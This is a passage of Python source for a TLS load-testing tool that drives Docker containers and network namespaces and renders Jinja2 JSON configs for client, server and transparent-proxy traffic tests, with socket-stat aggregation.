cfg_file = os.path.join(c_args.target_rundir, 'traffic', c_args.runtag, 'config.json')
cmd_ctrl_dir = os.path.join(c_args.target_rundir, 'traffic', c_args.runtag, 'cmdctl', zone['zone_label'])
result_dir = os.path.join(c_args.target_rundir, 'traffic', c_args.runtag, 'result', zone['zone_label'])
started_file = os.path.join (cmd_ctrl_dir, 'started.txt')
start_cmd_internal = '"ip netns exec {} /usr/local/bin/tlspack.exe {} {} {} {}"'.format (host_info['netns']
, result_dir.rstrip('/')
, started_file
, cfg_file
, z_index)
stop_cmd_internal = ''
for netdev in host_info['net_iface_map'].values():
cmd = ' "ip netns exec {} ip link set {} netns 1"'.format (host_info['netns'], netdev)
stop_cmd_internal += cmd
stop_cmd_internal += ' "ip netns del {}"'.format(host_info['netns'])
cmd_str = 'sudo docker exec -d {} python3 /usr/local/bin/tlspack.py {} {} {}'.format (zone_cname,
cmd_ctrl_dir,
start_cmd_internal,
stop_cmd_internal)
os.system (cmd_str)
cmd_ctrl_dir = os.path.join(c_args.host_rundir, 'traffic', c_args.runtag, 'cmdctl', zone['zone_label'])
started_file = os.path.join(cmd_ctrl_dir, 'started.txt')
finish_file = os.path.join (cmd_ctrl_dir, 'finish.txt')
while True:
time.sleep (1)
if os.path.exists (started_file) or os.path.exists (finish_file):
break
def start_traffic(host_info, c_args, traffic_s):
registry_dir = os.path.join(c_args.host_rundir, 'registry', 'one-app-mode')
registry_file = os.path.join(registry_dir, 'tag.txt')
if c_args.sysinit:
restart_containers (host_info, c_args)
os.system ("rm -rf {}".format (registry_dir))
# check if config runing
if os.path.exists(registry_file):
with open (registry_file) as f:
testname = f.read()
if testname == c_args.runtag:
print 'error: {} already running'.format (testname)
else:
print 'error: {} running'.format (testname)
sys.exit(1)
# create config dir; file
try:
cfg_j = json.loads (traffic_s)
traffic_s = json.dumps(cfg_j, indent=4)
except:
print traffic_s
sys.exit(1)
cfg_dir = os.path.join(c_args.host_rundir, 'traffic', c_args.runtag)
cfg_file = os.path.join(cfg_dir, 'config.json')
os.system ( 'rm -rf {}'.format(cfg_dir) )
os.system ( 'mkdir -p {}'.format(cfg_dir) )
with open(cfg_file, 'w') as f:
f.write(traffic_s)
# create registry entries
os.system ('mkdir -p {}'.format(registry_dir))
with open(registry_file, 'w') as f:
f.write(c_args.runtag)
for zone in cfg_j['zones']:
if not zone['enable']:
continue
is_app_enable = False
for app in zone['app_list']:
if app['enable']:
is_app_enable = True;
break
if not is_app_enable:
continue
zone_file = os.path.join(registry_dir, zone['zone_label'])
with open(zone_file, 'w') as f:
f.write('0')
master_file = os.path.join(registry_dir, 'master')
with open(master_file, 'w') as f:
f.write('0')
# create cmd_ctrl entries
cmd_ctrl_dir = os.path.join(cfg_dir, 'cmdctl')
os.system ('rm -rf {}'.format(cmd_ctrl_dir))
os.system ('mkdir -p {}'.format(cmd_ctrl_dir))
for zone in cfg_j['zones']:
if not zone['enable']:
continue
zone_dir = os.path.join (cmd_ctrl_dir, zone['zone_label'])
os.system ('mkdir -p {}'.format(zone_dir))
# create resullt entries
result_dir = os.path.join(c_args.host_rundir, 'traffic', c_args.runtag, 'result')
os.system ('rm -rf {}'.format(result_dir))
os.system ('mkdir -p {}'.format(result_dir))
zone_map = {}
for zone in cfg_j['zones']:
if not zone['enable']:
continue
zone_map[zone['zone_label']] = False
zone_dir = os.path.join (result_dir, zone['zone_label'])
os.system ('mkdir -p {}'.format(zone_dir))
for app in zone['app_list']:
if not app['enable']:
continue
app_dir = os.path.join (zone_dir, app['app_label'])
os.system ('mkdir -p {}'.format(app_dir))
if app.get('srv_list'):
for srv in app['srv_list']:
if not srv['enable']:
continue
srv_dir = os.path.join (app_dir, srv['srv_label'])
os.system ('mkdir -p {}'.format(srv_dir))
if app.get('proxy_list'):
for proxy in app['proxy_list']:
if not proxy['enable']:
continue
proxy_dir = os.path.join (app_dir, proxy['proxy_label'])
os.system ('mkdir -p {}'.format(proxy_dir))
if app.get('cs_grp_list'):
for cs_grp in app['cs_grp_list']:
if not cs_grp['enable']:
continue
cs_grp_dir = os.path.join (app_dir, cs_grp['cs_grp_label'])
os.system ('mkdir -p {}'.format(cs_grp_dir))
# start zones
for netdev in host_info['net_dev_list']:
cmd_str = "sudo ip link set dev {} up".format(netdev)
os.system (cmd_str)
next_step = 0
while next_step < host_info['max_sequence']:
next_step += 1
z_threads = []
z_index = -1
for zone in cfg_j['zones']:
z_index += 1
if not zone['enable']:
continue
if zone.get('step', 1) == next_step:
# zone_start_thread (host_info, c_args, zone, z_index)
thd = Thread(target=zone_start_thread, args=[host_info, c_args, zone, z_index])
thd.daemon = True
thd.start()
z_threads.append(thd)
if z_threads:
for thd in z_threads:
thd.join()
time.sleep(1) #can be removed later
return (cfg_dir, result_dir)
def zone_stop_thread(host_info, c_args, zone, z_index):
cmd_ctrl_dir = os.path.join(c_args.host_rundir, 'traffic', c_args.runtag, 'cmdctl', zone['zone_label'])
stop_file = os.path.join(cmd_ctrl_dir, 'stop.txt')
while True:
time.sleep(1)
if os.path.exists (stop_file):
break
try:
with open (stop_file, 'w') as f:
f.write('1')
except:
pass
finish_file = os.path.join(cmd_ctrl_dir, 'finish.txt')
while True:
time.sleep (1)
if os.path.exists (finish_file):
break
def stop_traffic(host_info, c_args):
registry_dir = os.path.join(c_args.host_rundir, 'registry', 'one-app-mode')
registry_file = os.path.join(registry_dir, 'tag.txt')
if c_args.sysinit:
restart_containers (host_info, c_args)
os.system ("rm -rf {}".format (registry_dir))
return
# check if config runing
if not os.path.exists(registry_file):
print 'no test running'
sys.exit(1)
with open (registry_file) as f:
c_args.runtag = f.read()
cfg_dir = os.path.join(c_args.host_rundir, 'traffic', c_args.runtag)
cfg_file = os.path.join(cfg_dir, 'config.json')
try:
with open(cfg_file) as f:
cfg_j = json.load(f)
except:
print 'invalid config file'
sys.exit(1)
z_threads = []
z_index = -1
for zone in cfg_j['zones']:
z_index += 1
if not zone['enable']:
continue
thd = Thread(target=zone_stop_thread, args=[host_info, c_args, zone, z_index])
thd.daemon = True
thd.start()
z_threads.append(thd)
for thd in z_threads:
thd.join()
os.system ("rm -rf {}".format (registry_dir))
def show_traffic (host_info, c_args):
registry_dir = os.path.join(c_args.host_rundir, 'registry', 'one-app-mode')
registry_file = os.path.join(registry_dir, 'tag.txt')
# check if config runing
if os.path.exists(registry_file):
with open (registry_file) as f:
testname = f.read()
print '{} running'.format (testname)
else:
print 'no test running'
def is_traffic (c_args):
registry_dir = os.path.join(c_args.host_rundir, 'registry', 'one-app-mode')
registry_file = os.path.join(registry_dir, 'tag.txt')
if os.path.exists(registry_file):
return True
return False
def add_cps_params (cmd_parser):
cmd_parser.add_argument('--ecdsa_cert'
, action="store_true"
, default=False
, help = '0/1')
def process_cps_template (cmd_args):
tlspack_cfg = jinja2.Template('''
{
"tgen_app" : "cps",
"zones" : [
{% set ns = namespace(cs_grp_count=0, srv_count=0) %}
{%- for zone_id in range(1, PARAMS.zones+1) %}
{
"zone_label" : "zone-{{zone_id}}-client",
"enable" : 1,
"step" : 2,
"app_list" : [
{
"app_type" : "tls_client",
"app_label" : "tls_client_1",
"enable" : 1,
"conn_per_sec" : {{PARAMS.cps}},
"max_pending_conn_count" : {{PARAMS.max_pipeline}},
"max_active_conn_count" : {{PARAMS.max_active}},
"total_conn_count" : {{PARAMS.total_conn_count}},
"cs_grp_list" : [
{% set ns.cs_grp_count = 0 %}
{%- for tls_ver in ['sslv3', 'tls1', 'tls1_1', 'tls1_2', 'tls1_3'] %}
{%- if (tls_ver == 'sslv3' and PARAMS.sslv3)
or (tls_ver == 'tls1' and PARAMS.tls1)
or (tls_ver == 'tls1_1' and PARAMS.tls1_1)
or (tls_ver == 'tls1_2' and PARAMS.tls1_2)
or (tls_ver == 'tls1_3' and PARAMS.tls1_3) %}
{{ "," if ns.cs_grp_count }}
{% set ns.cs_grp_count = ns.cs_grp_count+1 %}
{
"cs_grp_label" : "cs_grp_{{loop.index}}",
"enable" : 1,
"srv_ip" : "14.2{{zone_id}}.51.{{loop.index}}",
"srv_port" : 443,
"clnt_ip_begin" : "12.2{{zone_id}}.51.{{1+loop.index0*10}}",
"clnt_ip_end" : "12.2{{zone_id}}.51.{{loop.index*10}}",
"clnt_port_begin" : {{PARAMS.port_begin}},
"clnt_port_end" : 65000,
"cipher" : "{{PARAMS.cipher}}",
"tls_version" : "{{tls_ver}}",
"close_type" : "fin",
"close_notify" : "no_send",
"app_rcv_buff" : {{PARAMS.app_rcv_buff}},
"app_snd_buff" : {{PARAMS.app_snd_buff}},
"write_chunk" : {{PARAMS.app_next_write}},
"tcp_rcv_buff" : {{PARAMS.tcp_rcv_buff}},
"tcp_snd_buff" : {{PARAMS.tcp_snd_buff}},
"cs_data_len" : {{PARAMS.app_cs_data_len}},
"sc_data_len" : {{PARAMS.app_sc_data_len}},
"cs_start_tls_len" : {{PARAMS.app_cs_starttls_len}},
"sc_start_tls_len" : {{PARAMS.app_sc_starttls_len}}
}
{%- endif %}
{%- endfor %}
]
}
],
"zone_cmds" : [
"ip link set dev {{PARAMS.na_iface_container}} up",
"ifconfig {{PARAMS.na_iface_container}} hw ether {{PARAMS.client_mac_seed}}:{{'{:02x}'.format(zone_id)}}",
"ip route add default dev {{PARAMS.na_iface_container}} table 200",
"ip -4 route add local 12.2{{zone_id}}.51.0/24 dev lo",
"ip rule add from 12.2{{zone_id}}.51.0/24 table 200",
"tcpdump -i {{PARAMS.na_iface_container}} {{PARAMS.tcpdump}} -w {{PARAMS.result_dir_container}}/zone-{{zone_id}}-client/init.pcap &"
]
}
,
{
"zone_label" : "zone-{{zone_id}}-server",
"enable" : 1,
"step" : 1,
"app_list" : [
{
"app_type" : "tls_server",
"app_label" : "tls_server_1",
"enable" : 1,
"srv_list" : [
{% set ns.srv_count = 0 %}
{%- for tls_ver in ['sslv3', 'tls1', 'tls1_1', 'tls1_2', 'tls1_3'] %}
{%- if (tls_ver == 'sslv3' and PARAMS.sslv3)
or (tls_ver == 'tls1' and PARAMS.tls1)
or (tls_ver == 'tls1_1' and PARAMS.tls1_1)
or (tls_ver == 'tls1_2' and PARAMS.tls1_2)
or (tls_ver == 'tls1_3' and PARAMS.tls1_3) %}
{{ "," if ns.srv_count }}
{% set ns.srv_count = ns.srv_count+1 %}
{
"srv_label" : "srv_{{loop.index}}",
"enable" : 1,
"emulation_id" : 0,
"begin_cert_index" : {{zone_id*2000}},
"end_cert_index" : 100000,
"srv_ip" : "14.2{{zone_id}}.51.{{loop.index}}",
"srv_port" : 443,
"srv_cert" : "{{PARAMS.server_cert}}",
"srv_key" : "{{PARAMS.server_key}}",
"cipher" : "{{PARAMS.cipher}}",
"tls_version" : "{{tls_ver}}",
"close_type" : "fin",
"close_notify" : "no_send",
"app_rcv_buff" : {{PARAMS.app_rcv_buff}},
"app_snd_buff" : {{PARAMS.app_snd_buff}},
"write_chunk" : {{PARAMS.app_next_write}},
"tcp_rcv_buff" : {{PARAMS.tcp_rcv_buff}},
"tcp_snd_buff" : {{PARAMS.tcp_snd_buff}},
"cs_data_len" : {{PARAMS.app_cs_data_len}},
"sc_data_len" : {{PARAMS.app_sc_data_len}},
"cs_start_tls_len" : {{PARAMS.app_cs_starttls_len}},
"sc_start_tls_len" : {{PARAMS.app_sc_starttls_len}}
}
{%- endif %}
{%- endfor %}
]
}
],
"zone_cmds" : [
"ip link set dev {{PARAMS.nb_iface_container}} up",
"ifconfig {{PARAMS.nb_iface_container}} hw ether {{PARAMS.server_mac_seed}}:{{'{:02x}'.format(zone_id)}}",
"ip route add default dev {{PARAMS.nb_iface_container}} table 200",
"ip -4 route add local 14.2{{zone_id}}.51.0/24 dev lo",
"ip rule add from 14.2{{zone_id}}.51.0/24 table 200",
"tcpdump -i {{PARAMS.nb_iface_container}} {{PARAMS.tcpdump}} -w {{PARAMS.result_dir_container}}/zone-{{zone_id}}-server/init.pcap &"
]
}
{{ "," if not loop.last }}
{%- endfor %}
]
}
''')
if cmd_args.ecdsa_cert:
cmd_args.server_cert = '/rundir/certs/server2.cert'
cmd_args.server_key = '/rundir/certs/server2.key'
else:
cmd_args.server_cert = '/rundir/certs/server.cert'
cmd_args.server_key = '/rundir/certs/server.key'
return tlspack_cfg.render(PARAMS = cmd_args)
def process_cps_stats(result_dir):
ev_sockstats_client_list = []
ev_sockstats_server_list = []
result_dir_contents = []
try:
result_dir_contents = os.listdir(result_dir)
except:
pass
for zone_dir in result_dir_contents:
zone_dir_path = os.path.join(result_dir, zone_dir)
if os.path.isdir(zone_dir_path):
ev_sockstats_json_file = os.path.join (zone_dir_path
, 'ev_sockstats.json')
try:
with open(ev_sockstats_json_file) as f:
stats_j = json.load(f)
if zone_dir.endswith('-client'):
ev_sockstats_client_list.append (stats_j)
if zone_dir.endswith('-server'):
ev_sockstats_server_list.append (stats_j)
except:
pass
if ev_sockstats_client_list:
ev_sockstats = ev_sockstats_client_list.pop()
while ev_sockstats_client_list:
next_ev_sockstats = ev_sockstats_client_list.pop()
for k, v in next_ev_sockstats.items():
ev_sockstats[k] += v
with open(os.path.join(result_dir, 'ev_sockstats_client.json'), 'w') as f:
json.dump(ev_sockstats, f)
if ev_sockstats_server_list:
ev_sockstats = ev_sockstats_server_list.pop()
while ev_sockstats_server_list:
next_ev_sockstats = ev_sockstats_server_list.pop()
for k, v in next_ev_sockstats.items():
ev_sockstats[k] += v
with open(os.path.join(result_dir, 'ev_sockstats_server.json'), 'w') as f:
json.dump(ev_sockstats, f)
def add_bw_params (cmd_parser):
cmd_parser.add_argument('--ecdsa_cert'
, action="store_true"
, default=False
, help = '0/1')
def process_bw_template (cmd_args):
tlspack_cfg = jinja2.Template('''
{
"tgen_app" : "bw",
"zones" : [
{% set ns = namespace(cs_grp_count=0, srv_count=0) %}
{%- for zone_id in range(1, PARAMS.zones+1) %}
{
"zone_label" : "zone-{{zone_id}}-client",
"enable" : 1,
"app_list" : [
{
"app_type" : "tls_client",
"app_label" : "tls_client_1",
"enable" : 1,
"conn_per_sec" : {{PARAMS.cps}},
"max_pending_conn_count" : {{PARAMS.max_pipeline}},
"max_active_conn_count" : {{PARAMS.max_active}},
"total_conn_count" : {{PARAMS.total_conn_count}},
"cs_grp_list" : [
{% set ns.cs_grp_count = 0 %}
{%- for tls_ver in ['sslv3', 'tls1', 'tls1_1', 'tls1_2', 'tls1_3'] %}
{%- if (tls_ver == 'sslv3' and PARAMS.sslv3)
or (tls_ver == 'tls1' and PARAMS.tls1)
or (tls_ver == 'tls1_1' and PARAMS.tls1_1)
or (tls_ver == 'tls1_2' and PARAMS.tls1_2)
or (tls_ver == 'tls1_3' and PARAMS.tls1_3) %}
{{ "," if ns.cs_grp_count }}
{% set ns.cs_grp_count = ns.cs_grp_count+1 %}
{
"cs_grp_label" : "cs_grp_{{loop.index}}",
"enable" : 1,
"srv_ip" : "24.2{{zone_id}}.51.{{loop.index}}",
"srv_port" : 443,
"clnt_ip_begin" : "22.2{{zone_id}}.51.{{1+loop.index0*10}}",
"clnt_ip_end" : "22.2{{zone_id}}.51.{{loop.index*10}}",
"clnt_port_begin" : {{PARAMS.port_begin}},
"clnt_port_end" : 65000,
"cipher" : "{{PARAMS.cipher}}",
"tls_version" : "{{tls_ver}}",
"close_type" : "reset",
"close_notify" : "no_send",
"app_rcv_buff" : {{PARAMS.app_rcv_buff}},
"app_snd_buff" : {{PARAMS.app_snd_buff}},
"write_chunk" : {{PARAMS.app_next_write}},
"tcp_rcv_buff" : {{PARAMS.tcp_rcv_buff}},
"tcp_snd_buff" : {{PARAMS.tcp_snd_buff}},
"cs_data_len" : {{PARAMS.app_cs_data_len}},
"sc_data_len" : {{PARAMS.app_sc_data_len}},
"cs_start_tls_len" : {{PARAMS.app_cs_starttls_len}},
"sc_start_tls_len" : {{PARAMS.app_sc_starttls_len}}
}
{%- endif %}
{%- endfor %}
]
}
],
"zone_cmds" : [
"ip link set dev {{PARAMS.na_iface_container}} up",
"ifconfig {{PARAMS.na_iface_container}} hw ether {{PARAMS.client_mac_seed}}:{{'{:02x}'.format(zone_id)}}",
"ip route add default dev {{PARAMS.na_iface_container}} table 200",
"ip -4 route add local 22.2{{zone_id}}.51.0/24 dev lo",
"ip rule add from 22.2{{zone_id}}.51.0/24 table 200",
"tcpdump -i {{PARAMS.na_iface_container}} {{PARAMS.tcpdump}} -w {{PARAMS.result_dir_container}}/zone-{{zone_id}}-client/init.pcap &"
]
}
,
{
"zone_label" : "zone-{{zone_id}}-server",
"enable" : 1,
"app_list" : [
{
"app_type" : "tls_server",
"app_label" : "tls_server_1",
"enable" : 1,
"srv_list" : [
{% set ns.srv_count = 0 %}
{%- for tls_ver in ['sslv3', 'tls1', 'tls1_1', 'tls1_2', 'tls1_3'] %}
{%- if (tls_ver == 'sslv3' and PARAMS.sslv3)
or (tls_ver == 'tls1' and PARAMS.tls1)
or (tls_ver == 'tls1_1' and PARAMS.tls1_1)
or (tls_ver == 'tls1_2' and PARAMS.tls1_2)
or (tls_ver == 'tls1_3' and PARAMS.tls1_3) %}
{{ "," if ns.srv_count }}
{% set ns.srv_count = ns.srv_count+1 %}
{
"srv_label" : "srv_{{loop.index}}",
"enable" : 1,
"srv_ip" : "24.2{{zone_id}}.51.{{loop.index}}",
"srv_port" : 443,
"srv_cert" : "{{PARAMS.server_cert}}",
"srv_key" : "{{PARAMS.server_key}}",
"cipher" : "{{PARAMS.cipher}}",
"tls_version" : "{{tls_ver}}",
"close_type" : "reset",
"close_notify" : "no_send",
"app_rcv_buff" : {{PARAMS.app_rcv_buff}},
"app_snd_buff" : {{PARAMS.app_snd_buff}},
"write_chunk" : {{PARAMS.app_next_write}},
"tcp_rcv_buff" : {{PARAMS.tcp_rcv_buff}},
"tcp_snd_buff" : {{PARAMS.tcp_snd_buff}},
"cs_data_len" : {{PARAMS.app_cs_data_len}},
"sc_data_len" : {{PARAMS.app_sc_data_len}},
"cs_start_tls_len" : {{PARAMS.app_cs_starttls_len}},
"sc_start_tls_len" : {{PARAMS.app_sc_starttls_len}}
}
{%- endif %}
{%- endfor %}
]
}
],
"zone_cmds" : [
"ip link set dev {{PARAMS.nb_iface_container}} up",
"ifconfig {{PARAMS.nb_iface_container}} hw ether {{PARAMS.server_mac_seed}}:{{'{:02x}'.format(zone_id)}}",
"ip route add default dev {{PARAMS.nb_iface_container}} table 200",
"ip -4 route add local 24.2{{zone_id}}.51.0/24 dev lo",
"ip rule add from 24.2{{zone_id}}.51.0/24 table 200",
"tcpdump -i {{PARAMS.nb_iface_container}} {{PARAMS.tcpdump}} -w {{PARAMS.result_dir_container}}/zone-{{zone_id}}-server/init.pcap &"
]
}
{{ "," if not loop.last }}
{%- endfor %}
]
}
''')
if cmd_args.ecdsa_cert:
cmd_args.server_cert = '/rundir/certs/server2.cert'
cmd_args.server_key = '/rundir/certs/server2.key'
else:
cmd_args.server_cert = '/rundir/certs/server.cert'
cmd_args.server_key = '/rundir/certs/server.key'
return tlspack_cfg.render(PARAMS = cmd_args)
def process_bw_stats(result_dir):
ev_sockstats_client_list = []
ev_sockstats_server_list = []
result_dir_contents = []
try:
result_dir_contents = os.listdir(result_dir)
except:
pass
for zone_dir in result_dir_contents:
zone_dir_path = os.path.join(result_dir, zone_dir)
if os.path.isdir(zone_dir_path):
ev_sockstats_json_file = os.path.join (zone_dir_path
, 'ev_sockstats.json')
try:
with open(ev_sockstats_json_file) as f:
stats_j = json.load(f)
if zone_dir.endswith('-client'):
ev_sockstats_client_list.append (stats_j)
if zone_dir.endswith('-server'):
ev_sockstats_server_list.append (stats_j)
except:
ev_sockstats_client_list = []
ev_sockstats_server_list = []
break
if ev_sockstats_client_list:
ev_sockstats = ev_sockstats_client_list.pop()
while ev_sockstats_client_list:
next_ev_sockstats = ev_sockstats_client_list.pop()
for k, v in next_ev_sockstats.items():
ev_sockstats[k] += v
with open(os.path.join(result_dir, 'ev_sockstats_client.json'), 'w') as f:
json.dump(ev_sockstats, f)
if ev_sockstats_server_list:
ev_sockstats = ev_sockstats_server_list.pop()
while ev_sockstats_server_list:
next_ev_sockstats = ev_sockstats_server_list.pop()
for k, v in next_ev_sockstats.items():
ev_sockstats[k] += v
with open(os.path.join(result_dir, 'ev_sockstats_server.json'), 'w') as f:
json.dump(ev_sockstats, f)
def add_tproxy_params (cmd_parser):
pass
def process_tproxy_template (cmd_args):
tlspack_cfg = jinja2.Template ('''{
"tgen_app" : "tproxy",
"zones" : [
{
"zone_label" : "zone-1-proxy",
"enable" : 1,
"app_list" : [
{
"app_type" : "tcp_proxy",
"app_label" : "tcp_proxy_1",
"enable" : 1,
"proxy_list" : [
{
"proxy_label" : "bae-issue",
"enable" : 1,
"proxy_ip" : "0.0.0.0",
"proxy_port" : 883,
"proxy_type_id" : 1,
"tcp_rcv_buff" : 0,
"tcp_snd_buff" : 0
}
]
}
],
"host_cmds" : [
"sudo ip link set dev {{PARAMS.ta_iface}} up",
"sudo ip link set dev {{PARAMS.tb_iface}} up",
"sudo docker network connect {{PARAMS.ta_macvlan}} {{PARAMS.runtag}}-zone-1-proxy",
"sudo docker network connect {{PARAMS.tb_macvlan}} {{PARAMS.runtag}}-zone-1-proxy"
],
"zone_cmds" : [
"sysctl net.ipv4.conf.all.rp_filter=0",
"sysctl net.ipv4.conf.default.rp_filter=0",
"ip link set dev {{PARAMS.ta_iface_container}} up",
"ifconfig {{PARAMS.ta_iface_container}} hw ether 00:50:56:8c:5a:54",
"sysctl net.ipv4.conf.{{PARAMS.ta_iface_container}}.rp_filter=0",
"ip link add link {{PARAMS.ta_iface_container}} name {{PARAMS.ta_iface_container}}.{{PARAMS.proxy_traffic_vlan}} type vlan id {{PARAMS.proxy_traffic_vlan}}",
"ip link set dev {{PARAMS.ta_iface_container}}.{{PARAMS.proxy_traffic_vlan}} up",
"ip addr add 1.1.1.1/24 dev {{PARAMS.ta_iface_container}}.{{PARAMS.proxy_traffic_vlan}}",
"arp -i {{PARAMS.ta_iface_container}}.{{PARAMS.proxy_traffic_vlan}} -s 1.1.1.254 00:50:56:8c:86:c3",
"ip route add {{PARAMS.ta_subnet}} via 1.1.1.254 dev {{PARAMS.ta_iface_container}}.{{PARAMS.proxy_traffic_vlan}}",
"ip link set dev {{PARAMS.tb_iface_container}} up",
"ifconfig {{PARAMS.tb_iface_container}} hw ether 00:50:56:8c:86:c3",
"sysctl net.ipv4.conf.{{PARAMS.tb_iface_container}}.rp_filter=0",
"ip link add link {{PARAMS.tb_iface_container}} name {{PARAMS.tb_iface_container}}.{{PARAMS.proxy_traffic_vlan}} type vlan id {{PARAMS.proxy_traffic_vlan}}",
"ip link set dev {{PARAMS.tb_iface_container}}.{{PARAMS.proxy_traffic_vlan}} up",
"ip addr add 2.2.2.1/24 dev {{PARAMS.tb_iface_container}}.{{PARAMS.proxy_traffic_vlan}}",
"arp -i {{PARAMS.tb_iface_container}}.{{PARAMS.proxy_traffic_vlan}} -s 2.2.2.254 00:50:56:8c:5a:54",
"ip route add {{PARAMS.tb_subnet}} via 2.2.2.254 dev {{PARAMS.tb_iface_container}}.{{PARAMS.proxy_traffic_vlan}}",
"iptables -t mangle -N DIVERT",
"iptables -t mangle -A PREROUTING -p tcp -m socket -j DIVERT",
"iptables -t mangle -A DIVERT -j MARK --set-mark 1",
"iptables -t mangle -A DIVERT -j ACCEPT",
"ip rule add fwmark 1 lookup 100",
"ip route add local 0.0.0.0/0 dev lo table 100",
"iptables -t mangle -A PREROUTING -i {{PARAMS.ta_iface_container}}.{{PARAMS.proxy_traffic_vlan}} -p tcp --dport 443 -j TPROXY --tproxy-mark 0x1/0x1 --on-port 883",
"iptables -t mangle -A PREROUTING -i {{PARAMS.tb_iface_container}}.{{PARAMS.proxy_traffic_vlan}} -p tcp --dport 443 -j TPROXY --tproxy-mark 0x1/0x1 --on-port 883",
"tcpdump -i {{PARAMS.ta_iface_container}} {{PARAMS.ta_tcpdump}} -w {{PARAMS.result_dir_container}}/zone-1-proxy/ta.pcap &",
"tcpdump -i {{PARAMS.tb_iface_container}} {{PARAMS.tb_tcpdump}} -w {{PARAMS.result_dir_container}}/zone-1-proxy/tb.pcap &"
]
}
]
}
''')
return tlspack_cfg.render(PARAMS = cmd_args)
def process_tproxy_stats (result_dir):
pass
def add_mcert_params (cmd_parser):
pass
def process_mcert_template (cmd_args):
tlspack_cfg = jinja2.Template('''
{
"tgen_app" : "mcert",
"zones" : [
{% set ns = namespace(cs_grp_count=0, srv_count=0) %}
{%- for zone_id in range(1, PARAMS.zones+1) %}
{
"zone_label" : "zone-{{zone_id}}-client",
"enable" : 1,
"app_list" : [
{
"app_type" : "tls_client",
"app_label" : "tls_client_1",
"enable" : 1,
"conn_per_sec" : {{PARAMS.cps}},
"max_pending_conn_count" : {{PARAMS.max_pipeline}},
"max_active_conn_count" : {{PARAMS.max_active}},
"total_conn_count" : {{PARAMS.total_conn_count}},
"cs_grp_list" : [
{% set ns.cs_grp_count = 0 %}
{%- for tls_ver in ['sslv3', 'tls1', 'tls1_1', 'tls1_2', 'tls1_3'] %}
{%- if (tls_ver == 'sslv3' and PARAMS.sslv3)
or (tls_ver == 'tls1' and PARAMS.tls1)
or (tls_ver == 'tls1_1' and PARAMS.tls1_1)
or (tls_ver == 'tls1_2' and PARAMS.tls1_2)
or (tls_ver == 'tls1_3' and PARAMS.tls1_3) %}
{{ "," if ns.cs_grp_count }}
{% set ns.cs_grp_count = ns.cs_grp_count+1 %}
{
"cs_grp_label" : "cs_grp_{{loop.index}}",
"enable" : 1,
"srv_ip" : "14.2{{zone_id}}.51.{{loop.index}}",
"srv_port" : 443,
"clnt_ip_begin" : "12.2{{zone_id}}.51.{{1+loop.index0*10}}",
"clnt_ip_end" : "12.2{{zone_id}}.51.{{loop.index*10}}",
"clnt_port_begin" : {{PARAMS.port_begin}},
"clnt_port_end" : 65000,
"cipher" : "{{PARAMS.cipher}}",
"tls_version" : "{{tls_ver}}",
"close_type" : "fin",
"close_notify" : "no_send",
"app_rcv_buff" : {{PARAMS.app_rcv_buff}},
"app_snd_buff" : {{PARAMS.app_snd_buff}},
"write_chunk" : {{PARAMS.app_next_write}},
"tcp_rcv_buff" : {{PARAMS.tcp_rcv_buff}},
"tcp_snd_buff" : {{PARAMS.tcp_snd_buff}},
"cs_data_len" : {{PARAMS.app_cs_data_len}},
"sc_data_len" : {{PARAMS.app_sc_data_len}},
"cs_start_tls_len" : 0,
"sc_start_tls_len" : 0
}
{%- endif %}
{%- endfor %}
]
}
],
"zone_cmds" : [
"ip link set dev {{PARAMS.na_iface_container}} up",
"ifconfig {{PARAMS.na_iface_container}} hw ether {{PARAMS.client_mac_seed}}:{{'{:02x}'.format(zone_id)}}",
"ip route add default dev {{PARAMS.na_iface_container}} table 200",
"ip -4 route add local 12.2{{zone_id}}.51.0/24 dev lo",
"ip rule add from 12.2{{zone_id}}.51.0/24 table 200",
"tcpdump -i {{PARAMS.na_iface_container}} {{PARAMS.tcpdump}} -w {{PARAMS.result_dir_container}}/zone-{{zone_id}}-client/init.pcap &"
]
}
,
{
"zone_label" : "zone-{{zone_id}}-server",
"enable" : 1,
"iface" : "{{PARAMS.iface_container}}",
"tcpdump" : "{{PARAMS.tcpdump}}",
"app_list" : [
{
"app_type" : "tls_server",
"app_label" : "tls_server_1",
"enable" : 1,
"srv_list" : [
{% set ns.srv_count = 0 %}
{%- for tls_ver in ['sslv3', 'tls1', 'tls1_1', 'tls1_2', 'tls1_3'] %}
{%- if (tls_ver == 'sslv3' and PARAMS.sslv3)
or (tls_ver == 'tls1' and PARAMS.tls1)
or (tls_ver == 'tls1_1' and PARAMS.tls1_1)
or (tls_ver == 'tls1_2' and PARAMS.tls1_2)
or (tls_ver == 'tls1_3' and PARAMS.tls1_3) %}
{{ "," if ns.srv_count }}
{% set ns.srv_count = ns.srv_count+1 %}
{
"srv_label" : "srv_{{loop.index}}",
"enable" : 1,
"emulation_id" : 0,
"srv_ip" : "14.2{{zone_id}}.51.{{loop.index}}",
"srv_port" : 443,
"srv_cert" : "{{PARAMS.server_cert}}",
"srv_key" : "{{PARAMS.server_key}}",
"cipher" : "{{PARAMS.cipher}}",
"tls_version" : "{{tls_ver}}",
"close_type" : "fin",
"close_notify" : "no_send",
"app_rcv_buff" : {{PARAMS.app_rcv_buff}},
"app_snd_buff" : {{PARAMS.app_snd_buff}},
"write_chunk" : {{PARAMS.app_next_write}},
"tcp_rcv_buff" : {{PARAMS.tcp_rcv_buff}},
"tcp_snd_buff" : {{PARAMS.tcp_snd_buff}},
"cs_data_len" : {{PARAMS.app_cs_data_len}},
"sc_data_len" : {{PARAMS.app_sc_data_len}},
"cs_start_tls_len" : 0,
"sc_start_tls_len" : 0
}
{%- endif %}
{%- endfor %}
]
}
],
"zone_cmds" : [
"ip link set dev {{PARAMS.nb_iface_container}} up",
"ifconfig {{PARAMS.nb_iface_container}} hw ether {{PARAMS.server_mac_seed}}:{{'{:02x}'.format(zone_id)}}",
"ip route add default dev {{PARAMS.nb_iface_container}} table 200",
"ip -4 route add local 14.2{{zone_id}}.51.0/24 dev lo",
"ip rule add from 14.2{{zone_id}}.51.0/24 table 200",
"tcpdump -i {{PARAMS.nb_iface_container}} {{PARAMS.tcpdump}} -w {{PARAMS.result_dir_container}}/zone-{{zone_id}}-server/init.pcap &"
]
}
{{ "," if not loop.last }}
{%- endfor %}
]
}
''')
return tlspack_cfg.render(PARAMS = cmd_args)
def process_mcert_stats(result_dir):
ev_sockstats_client_list = []
ev_sockstats_server_list = []
result_dir_contents = []
try:
result_dir_contents = os.listdir(result_dir)
except:
pass
for zone_dir in result_dir_contents:
zone_dir_path = os.path.join(result_dir, zone_dir)
if os.path.isdir(zone_dir_path):
ev_sockstats_json_file = os.path.join (zone_dir_path
